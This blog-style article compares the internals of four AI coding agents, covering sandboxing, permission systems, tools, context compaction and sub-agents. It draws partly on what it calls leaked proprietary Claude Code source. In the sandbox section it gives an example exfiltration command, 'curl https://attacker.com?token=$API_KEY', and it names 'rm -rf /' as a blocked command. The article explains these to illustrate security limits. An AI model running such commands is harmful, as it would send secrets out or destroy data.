I expected the differences between AI coding agents to be in how they call the LLM. They're not. The API call is trivial -- a streaming HTTP request with a JSON payload. Every agent does it essentially the same way.
What makes these tools different -- what makes them products -- is everything wrapped around that API call: the 40 tools that give the AI hands, the permission systems that keep it from breaking things, the compaction strategies that prevent it from forgetting what it's doing, and the prompt engineering that shapes how it thinks.
I cloned the source code for all four major AI coding agents -- Claude Code (from a leaked copy of Anthropic's proprietary source), OpenAI's Codex CLI, Cline (the popular VS Code extension), and OpenCode (an open-source Go CLI) -- and read through their internals. What I found reveals four competing philosophies about a fundamental question: how much should you trust an AI with your codebase?
Here's what we're looking at:
| Claude Code | Codex CLI | Cline | OpenCode | |
|---|---|---|---|---|
| Maker | Anthropic | OpenAI | Community (OSS) | Community (OSS) |
| Language | TypeScript | Rust + TypeScript | TypeScript | Go |
| Interface | CLI + SDK + IDE | CLI (Rust TUI) | VS Code extension | CLI (TUI) |
| LLM Support | Claude only | OpenAI only | 50+ providers | Anthropic + OpenAI |
| Codebase | ~500K lines | ~80K lines | ~150K lines | ~30K lines |
| License | Proprietary (leaked) | Apache 2.0 | Apache 2.0 | MIT |
| Dimension | Claude Code | Codex | Cline | OpenCode |
|---|---|---|---|---|
| Security | Permission prompts + hooks | OS-level sandbox | UI approval + auto-approve | Channel-based approval |
| Tool concurrency | Parallel reads, serial writes | Serial (sandboxed) | Serial | Serial |
| Context mgmt | Multi-strategy compaction | Auto-compaction + truncation | Sliding window + summary | SQLite sessions + summary |
| Sub-agents | Full multi-agent with teams | Full multi-agent + guardian | Sub-agent system | Task sub-agents |
| File editing | Search-and-replace | Unified diff patch | Full rewrite or diff | Line-range edit |
| Session persistence | JSON transcript files | JSONL with session resume | VS Code workspace state | SQLite database |
| UI framework | React/Ink | ratatui (Rust) | VS Code Webview | Bubbletea |
The numbers don't tell the whole story. Let me walk through what actually matters.
The most revealing difference between these four tools isn't a feature. It's a philosophy.
Each tool sits at a different point on that spectrum:
- Watch every move and approve each action (OpenCode, Cline in default mode)
- Set rules up front -- "you can run git commands freely, but ask before touching anything outside /src" (Claude Code's permission system)
- Enforce isolation at the OS level -- constrain all commands to a sandboxed process the kernel controls (Codex)
- Grant full access and hope for the best (any tool in "YOLO mode")
That position shapes every architectural decision.
Codex is the only tool among the four that provides real process-level isolation. When the AI runs a shell command, that command executes inside an OS-level sandbox:
- macOS: Seatbelt sandbox profiles restrict filesystem access
- Linux: Landlock LSM + bubblewrap containers isolate the process
- Windows: Restricted process tokens limit capabilities
The sandbox enforces three tiers: read-only (can look but not touch), workspace-write (can modify files within the project directory only), and danger-full-access (no restrictions, requires explicit opt-in). Network access is controlled separately -- in the default mode, commands cannot make network requests at all.
If the AI decides to run rm -rf /, the operating system itself blocks the command. Not a permission prompt. Not a warning dialog.
The kernel says no.
Sandboxing isn't a complete answer, though. It prevents filesystem violations, but an approved network call could still exfiltrate data -- curl https://attacker.com?token=$API_KEY goes right through if network access is permitted. Security is defense in depth, not a single mechanism.
The tradeoff is friction. Sandboxed commands are slower. Some legitimate operations (installing packages, accessing APIs) require elevated permissions. The sandbox policy gets injected directly into the system prompt so the model knows its constraints before trying:
Filesystem sandboxing: sandbox_mode is `workspace-write`:
The sandbox permits reading files, and editing files in
`cwd` and `writable_roots`. Editing files in other
directories requires approval.
It tells the AI what it can't do before it tries, so it doesn't waste turns attempting something the sandbox would block anyway.
Claude Code has no process-level sandbox. Instead, it relies on a multi-layered permission system -- like a bouncer checking IDs rather than a locked door:
- Permission mode --
default(ask before writes),plan(show full plan first),bypassPermissions(approve everything) - Hook evaluation -- user-configured shell commands that run before each tool call
- Rule matching -- wildcard patterns like
Bash(git *),FileEdit(/src/*) - User prompt -- if no rule matches, ask the user
The Bash tool alone has an entire security subsystem: bashSecurity.ts validates commands for injection patterns, sedValidation.ts prevents sed from being used to bypass the file editing permission model, and destructiveCommandWarning.ts flags dangerous operations like rm -rf or git push --force.
The philosophy is: the AI should be powerful but supervised. A sophisticated permission system lets expert users grant broad access while keeping guardrails for everyone else. The risk is that permission prompts are only as good as the human reading them -- and a sufficiently crafted prompt injection (say, a malicious comment in a file the AI reads) could trick the model into requesting actions that look benign but aren't. Unlike Codex's kernel-enforced sandbox, Claude Code's safety depends on human judgment at every gate.
Cline runs inside VS Code, which shapes its entire security model. Before the AI edits a file, you see a diff preview. Before it runs a command, you see the command. You click approve or deny. It's the most transparent model -- you always know exactly what's about to happen.
There's a granular auto-approval system where you can approve categories of actions (read files: yes, execute bash: no, write files: ask me). And there's a "YOLO mode" toggle that approves everything. The name is honest about the risk, but it reduces security to a single checkbox -- users who enable it may underestimate the actual danger of full autonomy.
Cline also has a CommandPermissionController that flags dangerous shell operators like >, |, and &&. But fundamentally, the security model is: trust the human to review what the AI wants to do.
OpenCode uses Go channels to create a clean blocking-approval pattern. When the agent needs permission, it creates a channel, publishes the request to the TUI, and blocks until the user responds. Persistent session-level approvals mean you don't get asked the same question twice.
It's the simplest model: ask, wait, proceed. No sandbox, no rule engine, no hooks. Just a channel and a human.
The AI is only as capable as the tools it can use. The differences are in how many tools each system provides and how it coordinates them.
Claude Code has the largest tool inventory: file read, file write, file edit, glob search, grep search, bash execution, web fetch, web search, notebook editing, MCP integration, LSP queries, sub-agent spawning, team creation, skill loading, and more.
The orchestration layer is particularly clever. It partitions tool calls into batches based on their nature:
- Read-only tools (file reads, searches) run concurrently, up to 10 in parallel
- Write tools (file edits, bash commands) run serially
So when the AI wants to read 10 files and then edit one, the 10 reads happen simultaneously, then the edit runs alone. For a typical coding task that involves reading many files before making a change, this parallel execution saves real time.
One optimization I haven't seen elsewhere: a StreamingToolExecutor starts executing tools while the model is still generating its response. If the model emits a complete tool call before it's done talking, execution begins immediately rather than waiting for the full response to finish. On a multi-tool response, this can shave seconds off wall-clock time -- the file reads are already done by the time the model finishes explaining what it's about to do.
The article you might read elsewhere would tell you Codex has only a handful of tools. That's wrong. The Rust core defines 25+ tool handlers including shell execution, code patching (in both JSON and freeform formats), directory listing, JavaScript REPL, multi-agent orchestration (spawn, resume, wait, close, send-message, list, assign-task), image viewing, MCP integration, and even batch agent jobs via spawn_agents_on_csv.
Codex's apply_patch tool deserves special attention. Instead of Claude Code's search-and-replace or Cline's full-file rewrites, Codex uses unified diff format. The model generates a patch, and the tool applies it.
This isn't just about token efficiency (though it is more efficient). Unified diff is a semantic design choice. It forces the model to reason about context lines, creating an implicit incentive for surgical edits rather than wholesale rewrites. It also makes the output portable -- AI-generated patches can be reviewed with standard diff/patch utilities, piped into code review tools, or applied by hand. Search-and-replace can silently match in the wrong location if a pattern appears multiple times; diffs are anchored to specific positions in specific files.
Every tool goes through the sandbox system. The sandbox requirements are declared per-tool, so the system knows which permissions each tool needs before it executes.
Cline's most interesting tool trick is dual-mode definitions. Each tool has variants for different model families:
For older models that don't support function calling, tools are rendered as XML in the system prompt:
<write_to_file>
<path>src/app.ts</path>
<content>file contents here</content>
</write_to_file>For newer Anthropic and OpenAI models, the same tools use native function calling APIs. This lets Cline support models that range from GPT-5 down to local Ollama models that can only parse XML.
Cline also has browser automation via Puppeteer -- a capability that lets the AI navigate web pages, click buttons, fill forms, and take screenshots. If you're building a web app and want the AI to actually test it in a browser, Cline is the only tool that does this natively.
OpenCode has a smaller set (Bash, Edit, Fetch, Glob, Grep, LS, View, Patch, Write, Diagnostic, Agent) but with one standout: the Diagnostic tool. It queries running LSP (Language Server Protocol) servers for code diagnostics -- compiler errors, type mismatches, unused imports.
Both Claude Code and OpenCode have LSP integration, but OpenCode makes it a first-class tool the agent can invoke directly. The agent doesn't need to run a build command and parse the output to find errors; it can ask the language server directly. This gives it IDE-level understanding of the codebase.
LLMs forget. They have fixed context windows -- typically 128K to 200K tokens -- and a long coding session can easily overflow that. When it happens, the AI starts losing track of earlier decisions, file contents it read, and the overall plan. Each tool handles this differently.
Claude Code throws everything at the problem:
- Proactive compaction -- monitors token count and summarizes older messages before hitting the limit
- Reactive compaction -- catches
prompt_too_longerrors from the API and compacts retroactively - Snip compaction -- in SDK/headless mode, truncates at defined boundaries to bound memory in long sessions
- Context collapse -- a feature-flagged system that compresses verbose tool results mid-conversation without full compaction
The compaction produces a "compact boundary" marker. Everything before the boundary is replaced with a summary. The system is careful about persistence -- transcript files handle boundary relinks so --resume works correctly after compaction, even if the process was killed mid-turn.
There's also an LRU file state cache (100 files, 25MB) that tracks file contents across turns, preventing redundant re-reads.
Codex's context management is more capable than it looks from the outside. The Rust core includes compact.rs and compact_remote.rs with pre-turn compaction, mid-turn compaction, and remote compaction strategies. A summarization prompt template generates concise context summaries, and token-aware truncation via the output truncation utilities keeps tool results from dominating the context window.
Cline takes a pragmatic approach. It calculates usable context per model (200K Claude models get a 160K buffer; 128K models get 98K). When approaching the limit, a CondenseHandler asks the LLM itself to summarize the conversation -- capturing intent, modified files, code snippets, pending tasks, and next steps. It's meta-prompting: the AI summarizes its own work so it can continue from the summary.
OpenCode stores everything in SQLite -- sessions, messages, token counts, costs. Sessions can have sub-sessions (for tool calls) and auto-generated titles. The SummaryMessageID field enables conversation summarization, though the compaction is simpler than the others.
This is where having the actual source code matters most. You can't reverse-engineer a system prompt from the outside. How these tools instruct the LLM reveals their design philosophy more than any other component.
Claude Code's system prompt is assembled from ~15 composable functions, each generating a section: identity, system rules, coding style, destructive action safety, tool usage guidance, tone, output efficiency, environment info, memory, MCP instructions.
Three patterns stand out:
The cache boundary. A marker called __SYSTEM_PROMPT_DYNAMIC_BOUNDARY__ splits the prompt into two halves. Everything above is static -- the behavioral instructions that are the same for every user -- and gets cached with scope: 'global' in the Anthropic API. Everything below is per-session (your CLAUDE.md files, your MCP servers, your environment). This means the ~3,000 tokens of behavioral rules are cached and reused across all users globally, saving on API costs at scale.
Numeric length anchors. Instead of saying "be concise," the internal prompt says:
Length limits: keep text between tool calls to <=25 words.
Keep final responses to <=100 words unless the task
requires more detail.
An internal source code comment references "~1.2% output token reduction vs qualitative 'be concise'" from A/B testing. That's internal company data, not peer-reviewed research, but it suggests Anthropic treats prompt wording like ad copy -- specific numbers outperform vague instructions, and they're measuring the difference.
Internal vs. external prompts. A process.env.USER_TYPE === 'ant' check throughout the codebase gives Anthropic's internal engineers different prompts. Internal users get: "If you notice the user's request is based on a misconception, say so" and "Never claim 'all tests pass' when output shows failures." There are also A/B test markers throughout: @[MODEL LAUNCH]: capy v8 thoroughness counterweight (PR #24302) -- un-gate once validated on external via A/B. The leaked source is a window into how Anthropic iterates on prompt engineering in production.
Codex's cleverest prompt idea is injecting the current sandbox policy directly into the system prompt. The model is told exactly what it can and cannot do before it tries. This reduces wasted turns where the model attempts something the sandbox would block.
Cline uses a PromptRegistry with model-family variants. The same conceptual instruction renders differently for Claude, GPT-5, Gemini, and generic models. This is necessary overhead when supporting 50+ providers -- each model responds differently to the same phrasing.
OpenCode takes a simpler approach -- different base prompts for Anthropic and OpenAI models, selected at runtime based on the configured provider. The prompts include instructions for OpenCode.md (their equivalent of CLAUDE.md) and LSP integration guidance.
All four tools can now spawn sub-agents -- separate AI instances that work on sub-problems independently. The implementations vary wildly.
Claude Code has the richest multi-agent system among the four:
AgentToolspawns sub-agents with their ownQueryEngineinstances and filtered tool sets- Agents can run foreground (blocking) or background (async, with notification on completion)
SendMessageToolenables inter-agent communicationTeamCreateToolspawns multiple agents as a coordinated team- Agents can get their own git worktrees -- filesystem-level isolation so they don't step on each other's changes
- A "fork" mode where the sub-agent keeps its tool output out of the parent's context (protecting the parent from context bloat)
- Auto-background after 120 seconds to prevent sub-agents from blocking indefinitely
The system prompt explicitly prevents infinite delegation: "If you ARE the fork -- execute directly; do not re-delegate."
Codex has a more extensive multi-agent system than it's usually given credit for. The Rust core includes full agent lifecycle management: spawn_agent, resume_agent, wait_agent, close_agent, send_message, list_agents, and assign_task. There's even spawn_agents_on_csv for batch agent jobs.
On top of this, Codex has a guardian_subagent -- a separate AI that reviews tool calls for policy compliance. Think of it as a security reviewer that runs alongside the main agent, catching dangerous actions before they execute. When the guardian is uncertain, it escalates to the user.
Cline has a sub-agent system built around SubagentRunner, SubagentBuilder, and SubagentToolHandler, with configurable agent definitions loaded via AgentConfigLoader. Sub-agents can be defined and spawned for specific tasks.
OpenCode supports task sub-agents that get their own tool sets and sessions stored as child records in SQLite. Simpler than Claude Code's or Codex's systems, but functional.
Nobody talks about this enough: Claude Code only works with Claude. Codex only works with OpenAI models.
If you build your workflow around Claude Code, you're locked into Anthropic's pricing and availability. Same for Codex with OpenAI. If either company raises prices, degrades quality, or suffers an outage, you have no fallback.
Cline is the escape hatch. Its 50+ provider support means you can switch models -- or use local models via Ollama -- without changing your workflow. The tradeoff is that multi-provider support adds complexity and the experience is inevitably less polished than a tool optimized for a single provider.
OpenCode splits the difference: it supports both Anthropic and OpenAI, giving you a choice between the two largest providers without the sprawl of 50+ integrations.
For team adoption, this matters more than any technical comparison. The best architecture is irrelevant if the company changes its pricing model.
The tool system is the product. Claude Code has 500K lines of code; the actual API call is maybe 200 of them. Everything else is the harness -- and the harness is where the differentiation happens.
Security reflects different threat models, not a linear scale. Codex provides OS-enforced isolation. Claude Code provides user-configurable permission rules. Cline prioritizes human oversight. None is universally "more secure" -- each optimizes for different use cases and different levels of user expertise. But as these tools gain autonomy, all of them will need to get better here. Permission prompts don't scale to agents that run overnight.
Multi-agent is where the hard engineering problems are. All four tools now support sub-agents in some form. The challenges -- shared state, merge conflicts, context isolation, preventing infinite delegation -- are the same challenges distributed systems have always faced. The team that solves multi-agent coordination cleanly wins.
Context management separates toys from tools. The difference between an agent that works for a 10-minute task and one that works for a 10-hour session is entirely about how it handles forgetting. Claude Code's four-layer compaction, Codex's Rust-powered truncation, Cline's self-summarization -- they're all fighting the same enemy.
The survivors will combine Codex's security model, Claude Code's orchestration, Cline's flexibility, and OpenCode's LSP integration. Whether that convergence happens through competition or open-source collaboration is the interesting question.
For maximum capability today: Claude Code. Deepest tool system, best context management, most powerful multi-agent orchestration. The tradeoff is vendor lock-in to Anthropic and a complexity level that's hard to debug when things go wrong.
For security-sensitive environments: Codex. OS-level sandboxing is a fundamentally different safety guarantee than permission prompts. If you're working on a codebase where a runaway command could cause real damage, Codex is the only tool that provides genuine containment. Its multi-agent and compaction capabilities are better than people think.
For maximum flexibility: Cline. If you want to use whatever model is best right now -- or switch tomorrow without changing your workflow -- Cline is the only option. Browser automation and sub-agents are bonuses. The tradeoff is it only runs inside VS Code.
For understanding and customization: OpenCode. At 30K lines of clean Go, you can read the entire codebase in a day. If you want to fork a coding agent and build on it, start here. LSP integration and SQLite sessions are well-engineered foundations.
Right now, your choice of model often forces your choice of harness -- Claude Code for Claude, Codex for GPT. That coupling will weaken as models commoditize and the harness features (multi-agent, security, context management) become the real differentiators. The shift is already visible: Cline's 50+ provider support exists precisely because some users value harness flexibility over model lock-in.